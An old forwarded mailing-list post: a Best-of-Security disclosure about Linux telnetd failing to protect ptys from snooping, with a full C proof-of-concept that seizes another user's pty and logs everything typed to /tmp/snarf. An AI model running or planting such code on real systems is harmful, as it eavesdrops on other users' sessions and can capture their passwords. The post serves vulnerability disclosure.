
Linux tty Surfing ... any1 had problems with it ?!



Got this in the mail,
did anyone have any problems with it?
Any known fixes?

Forwarded message:
> Received: from suburbia.net (suburbia.apana.org.au [192.188.107.90]) by yarrina.connect.com.au with ESMTP id CAA26655
>   (8.6.12/IDA-1.6); Wed, 27 Sep 1995 02:58:06 +1000
> Received: (majordom@localhost) by suburbia.net (8.6.12/Proff-950810) id XAA10939 for best-of-security-outgoing; Tue, 26 Sep 1995 23:08:07 +1000
> Received: (proff@localhost) by suburbia.net (8.6.12/Proff-950810) id XAA10930 for best-of-security; Tue, 26 Sep 1995 23:07:49 +1000
> Date: Tue, 26 Sep 1995 23:07:49 +1000
> From: Julian Assange <proff@suburbia.net>
> Message-Id: <199509261307.XAA10930@suburbia.net>
> To: best-of-security@suburbia.net
> Subject: BoS: linux tty surfing
> Sender: owner-best-of-security@suburbia.net
> Errors-to: nobody@connect.com.au
> Reply-To: nobody@connect.com.au
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
> Hi all,
> 
> I've done some more testing on this, and got the following results
> with 1.2.10 (yeah, I'm not really on the bleeding edge):
> 
>         * telnetd as of NetKit-0.5 does not protect you from anyone
>           snooping on your pty. I guess we know that by now.
>           There's some code in sys_term.c that does a vhangup on the
>           pty, but it's commented out for Linux. The comment says that
>           this appears to be buggy.
> 
>         * Using login from util-linux-2.2 helps a bit. If you do a
>           cat /dev/ttyp0, it will terminate once login is executed by
>           telnetd. That's because login *does* do a vhangup.
> 
>         * Unfortunately, this is not the end of it. I experimented
>           a little, and found that a program that ignores all signals
>           *and* makes the pty its controlling tty will happily live on,
>           and is still able to read data from it. I'm including it
>           below.
> 
>           What I do not understand is why this does not make telnetd
>           fail when doing an ioctl(TIOCSCTTY). Anyone more familiar with
>           this stuff may be able to shed some light on this (Ted?).
> 
> Olaf
> - --
> Olaf Kirch         |  --- o --- Nous sommes du soleil we love when we play
> okir@monad.swb.de  |    / | \   sol.dhoop.naytheet.ah kin.ir.samse.qurax
>              For my PGP public key, finger okir@brewhq.swb.de.
> - ------------------------------------------------------------------
> /*
>  * simple test program for. Not my usual standard of coding...
>  */
> #include <stdio.h>
> #include <unistd.h>
> #include <signal.h>
> #include <termios.h>
> #include <fcntl.h>              /* open(), O_RDWR */
> #include <sys/types.h>
> #include <sys/ioctl.h>          /* ioctl(), TIOCSCTTY */
> 
> int
> main(int argc, char **argv)
> {
>         char    buffer[256];
>         FILE    *fp;
>         int     fd, i, n;
> 
>         for (i = 0; i < 256; i++)
>                 close(i);
>         setsid();
>         if ((fd = open(argv[1], O_RDWR)) < 0) {
>                 perror("open");
>                 return 2;
>         }
>         if (ioctl(fd, TIOCSCTTY, NULL) < 0)
>                 perror("ioctl");
>         if ((fp = fopen("/tmp/snarf", "w")) == NULL)
>                 return 2;
>         for (i = 0; i < 32; i++)
>                 signal(i, SIG_IGN);
>         while ((n = read(fd, buffer, 255)) > 0) {
>                 buffer[n] = 0;
>                 fprintf(fp, "got %s\n", buffer);
>         }
>         perror("read");
>         return 2;
> }
> 
> --
> 
> 
> did I say, "dumb."
> 


-- 

Oren Poleg, 				Work: (972)-3-5750570
System Administrator			Home: (972)-9-919678

Euronet Communications			http://www.euronet.co.il/~poleg


			Public key available on finger